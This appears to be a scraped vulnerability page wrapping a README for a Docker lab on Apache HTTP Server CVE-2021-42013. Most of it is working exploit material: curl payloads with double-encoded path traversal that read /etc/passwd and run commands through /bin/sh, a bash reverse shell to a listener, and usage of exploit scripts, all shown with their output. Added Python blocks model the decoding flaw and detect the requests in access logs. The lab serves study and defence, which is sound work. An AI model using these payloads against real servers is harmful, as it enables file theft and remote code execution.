Related vulnerability
Title:
Apache HTTP Server security vulnerability
(CVE-2021-42013)
Description: Apache HTTP Server is an open-source web server from the Apache Foundation (USA). It is fast, reliable and extensible through a simple API. Apache HTTP Server has a security vulnerability: the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was found to be insufficient. An attacker can use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If, in addition, for these alia
Description
Docker container lab to play/learn with CVE-2021-42013
Introduction
# CVE-2021-42013
## Introduction
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions [[1]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013).
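The reason the 2.4.50 fix could be bypassed is easiest to see with a small model of the two decoding stages a request path goes through. The following Python is an added illustration, not code from this lab or from httpd: it assumes a simplified pipeline (stage 1 decodes percent-escapes once and collapses `..`, as the 2.4.50 normaliser does for unreserved characters; stage 2 models the `ScriptAlias /cgi-bin/` mapping, which unescapes the remainder a second time before building the filesystem path) and the official httpd image's layout under `/usr/local/apache2`, which is an assumption since the lab's `httpd.conf` is not reproduced here.

```python
"""
Added example (not code from the twseptian lab or from Apache httpd): a
simplified model of why 2.4.50's fix for CVE-2021-41773 is bypassed by the
double-encoded dots of CVE-2021-42013.

Assumptions (a model, not httpd's real code path):
  * stage 1 models the 2.4.50 normaliser: decode percent-escapes ONCE, then
    collapse '.' and '..' segments inside the URI;
  * stage 2 models ScriptAlias mapping of /cgi-bin/, which unescapes the
    remainder a second time before building the filesystem path;
  * directory layout is the official httpd image's (/usr/local/apache2/...).
"""
import posixpath
from urllib.parse import unquote

CGI_DIR = "/usr/local/apache2/cgi-bin"
DOCROOT = "/usr/local/apache2/htdocs"

TRAVERSAL_STYLES = {
    "plain":  "../",               # collapsed by the normaliser, never reaches stage 2
    "single": ".%2e/",             # CVE-2021-41773 form, caught by the 2.4.50 decode
    "double": "%%32%65%%32%65/",   # CVE-2021-42013 form used in this lab
}


def build_traversal(depth, style="double"):
    """One encoded '../' segment repeated `depth` times."""
    return TRAVERSAL_STYLES[style] * depth


def build_poc_url(host, port, depth, target, style="double"):
    """Same URL shape as the lab's curl PoC: /cgi-bin/<traversal><absolute target>."""
    return f"http://{host}:{port}/cgi-bin/{build_traversal(depth, style)}{target.lstrip('/')}"


def resolve(request_path):
    """Return the filesystem path the model maps `request_path` to."""
    # Stage 1: urllib's unquote leaves an invalid '%%' as a literal '%', so
    # '%%32%65' becomes '%2e' here. That segment is not '..' yet, so the
    # normaliser has nothing to collapse and the path keeps its /cgi-bin/ prefix.
    uri = posixpath.normpath(unquote(request_path))
    # Stage 2: alias mapping unescapes again. Only now does '%2e%2e' turn into
    # '..', and the join with CGI_DIR walks out of the aliased directory.
    if uri.startswith("/cgi-bin/"):
        rest = unquote(uri[len("/cgi-bin/"):])
        return posixpath.normpath(CGI_DIR + "/" + rest)
    return posixpath.normpath(DOCROOT + unquote(uri))


def escapes_webroot(request_path):
    """True when the mapped path lands outside both the CGI dir and DocumentRoot."""
    fs = resolve(request_path)
    return not (fs.startswith(CGI_DIR + "/") or fs.startswith(DOCROOT + "/"))


if __name__ == "__main__":
    for style in TRAVERSAL_STYLES:
        path = "/cgi-bin/" + build_traversal(7, style) + "etc/passwd"
        print(f"{style:6s} -> {resolve(path)} (escapes={escapes_webroot(path)})")
    print(build_poc_url("172.17.0.2", 80, 7, "/etc/passwd"))
```

Running it shows `plain` and `single` ending up under `htdocs` (a 404 at worst) while `double` resolves to `/etc/passwd`; the same model maps `/cgi-bin/<traversal>/bin/sh` to `/bin/sh`, and because that request was matched by `ScriptAlias`, mod_cgi executes the file with the POST body on its stdin, which is why the RCE PoC bodies below start with `echo Content-Type: text/plain; echo;` before the actual command.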
## Docker container lab to play/learn with CVE-2021-42013
1. File disclosure vulnerability configuration (CGI not enabled). The container's port 80 is published on host port 81; the PoCs below address the container's bridge IP directly (172.17.0.2 in this run), which may differ on your host.
```bash
$ docker build -t apache-default default_conf
$ docker run -dit --name apache-app -p 81:80 apache-default
```
- Proof of Concept:
```bash
$ curl -s --path-as-is "http://172.17.0.2:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
```
- using `path_traversal_vuln.py`
```bash
$ python3 path_traversal_vuln.py -h
>> CVE-2021-42013 - Path Traversal
>> by twseptian
usage: path_traversal_vuln.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -f FILE_READ
CVE-2021-42013 - Path Traversal
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL Target IP
-p TARGET_PORT, --port TARGET_PORT
Target port
-x PAYLOAD, --execute PAYLOAD
Path Traversal Payload
-f FILE_READ, --file FILE_READ
File to read
```
```bash
$ python3 path_traversal_vuln.py -t 172.17.0.2 -p 80 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65' -f /etc/passwd
```

2. Remote Code Execution (CGI enabled) configuration. This container publishes port 80 on host port 82; the PoCs below again use the container's bridge IP (172.17.0.3 in this run), which may differ on your host.
```bash
$ docker build -t apache-cgi cgi_mod_enable
$ docker run -dit --name apache-lab -p 82:80 apache-cgi
```
- Proof of Concept:
```bash
$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```
- PoC using bash reverse shell
```bash
$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/172.17.0.1/4444 0>&1" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"
```
- netcat output
```bash
$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.3.
Ncat: Connection from 172.17.0.3:35660.
daemon@dcbbed945af7:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@dcbbed945af7:/bin$
```
- using `rce.py`
```bash
$ python3 rce.py -h
>> CVE-2021-42013 - Remote Code Execution
>> by twseptian
usage: rce.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -s SHELL
CVE-2021-42013 - Path Traversal
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL Target IP
-p TARGET_PORT, --port TARGET_PORT
Target port
-x PAYLOAD, --execute PAYLOAD
Path Traversal Payload
-s SHELL, --shell SHELL
shell
```
```bash
$ python3 rce.py -t 172.17.0.3 -p 80 -x '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65' -s "/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
```
- netcat listener
```bash
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41052
daemon@82f07f4b32a8:/bin$
```

- using `rce2.py`
```bash
$ python3 rce2.py -h
>> CVE-2021-42013 - Remote Code Execution
>> by twseptian
usage: rce2.py [-h] -t URL -p TARGET_PORT -L LOCALHOST -P LOCALPORT -x PAYLOAD
CVE-2021-42013 - Path Traversal
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL Target IP
-p TARGET_PORT, --port TARGET_PORT
Target port
-L LOCALHOST, --lh LOCALHOST
Localhost/Local IP
-P LOCALPORT, --lp LOCALPORT
Localport
-x PAYLOAD, --execute PAYLOAD
Path Traversal Payload
```
```bash
$ python3 rce2.py -t 172.17.0.3 -p 80 -L 172.17.0.1 -P 4444 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65'
>> CVE-2021-42013 - Remote Code Execution
>> by twseptian
[!] Payload: .%%32%65/.%%32%65/.%%32%65/.%%32%65
[*] Setting up a netcat listener
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41122
bash: initialize_job_control: no job control in background: Bad file descriptor
daemon@82f07f4b32a8:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@82f07f4b32a8:/bin$
```
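Both PoC variants leave a recognisable trace in the server's access log, because httpd logs the request line as it was sent, encoded dots included. The following Python is an added example, not part of the lab or its scripts: it classifies Common Log Format lines into single-encoded (CVE-2021-41773 style), double-encoded (CVE-2021-42013 style) traversals and flags a POST whose traversal resolves to a shell interpreter as a command-execution attempt. The log lines are constructed for this example, and the interpreter list is an assumption you would extend for your own hosts.

```python
"""
Added example (not part of the twseptian lab): spotting CVE-2021-41773 /
CVE-2021-42013 requests in Apache access logs (Common/Combined Log Format),
including the CGI-based command execution variant.

Assumptions: the request field is the raw request line as sent, so encoded
dots appear exactly as the attacker typed them; SAMPLE_LOG is constructed for
this example, not captured from the lab; INTERPRETERS is a starting list.
"""
import posixpath
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A traversal into /cgi-bin/ that lands on one of these is a command-execution primitive
INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/perl", "/usr/bin/python3"}

# Constructed sample lines: the lab's two PoCs, a 41773-style probe, a plain scanner, and normal traffic
SAMPLE_LOG = [
    '172.17.0.1 - - [05/Oct/2021:10:00:01 +0000] "GET /cgi-bin/' + "%%32%65%%32%65/" * 7 + 'etc/passwd HTTP/1.1" 200 1234 "-" "curl/7.74.0"',
    '172.17.0.1 - - [05/Oct/2021:10:00:02 +0000] "POST /cgi-bin/' + "%%32%65%%32%65/" * 7 + 'bin/sh HTTP/1.1" 200 46 "-" "curl/7.74.0"',
    '172.17.0.1 - - [05/Oct/2021:10:00:03 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.74.0"',
    '172.17.0.1 - - [05/Oct/2021:10:00:04 +0000] "GET /cgi-bin/../../etc/passwd HTTP/1.1" 400 226 "-" "scanner"',
    '172.17.0.1 - - [05/Oct/2021:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
]


def traversal_encoding(raw_path):
    """Return how the '..' was hidden, or None.

    A literal '../' is collapsed by httpd's normaliser and is just scanner
    noise; the interesting case is a '..' that only exists after one decode
    (CVE-2021-41773, e.g. '.%2e/') or after two (CVE-2021-42013, '%%32%65').
    """
    path = raw_path.split("?", 1)[0]
    if ".." in path.split("/"):
        return None
    once = unquote(path)
    if ".." in once.split("/"):
        return "single-encoded"
    if ".." in unquote(once).split("/"):
        return "double-encoded"
    return None


def classify_request(method, raw_path):
    """Classify one request; the target is what the fully decoded path resolves to."""
    encoding = traversal_encoding(raw_path)
    if encoding is None:
        return None
    target = posixpath.normpath(unquote(unquote(raw_path.split("?", 1)[0])))
    kind = "rce-attempt" if method == "POST" and target in INTERPRETERS else "file-read"
    return {"kind": kind, "encoding": encoding, "target": target}


def scan_access_log(lines):
    """Return one finding dict per suspicious line; the status tells you whether it worked."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m["method"], m["path"])
        if hit:
            hit.update(ip=m["ip"], method=m["method"], status=int(m["status"]))
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['kind']:11s} {f['encoding']:14s} -> {f['target']} ({f['status']})")
```

The HTTP status is the field to triage on: a `200` on a double-encoded traversal means the read or command succeeded, whereas the `403` on the single-encoded probe is the 2.4.50 fix doing its job. Note that the POST body (the actual command) is not in the access log, so a suspected `rce-attempt` has to be followed up on the host itself.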

References
- [[1] CVE-2021-42013](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013)
- [[2] Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50406)
File snapshot
[4.0K] /data/pocs/9362cdefe926e167bf69989ad3fe8666301614aa
├── [4.0K] cgi_mod_enable
│ ├── [ 71] Dockerfile
│ └── [ 20K] httpd.conf
├── [4.0K] default_conf
│ ├── [ 71] Dockerfile
│ └── [ 20K] httpd.conf
├── [ 99K] path_traversal.png
├── [2.8K] path_traversal_vuln.py
├── [3.1K] rce1.py
├── [ 33K] rce2.png
├── [3.7K] rce2.py
├── [ 40K] rce.png
└── [6.3K] README.md
2 directories, 11 files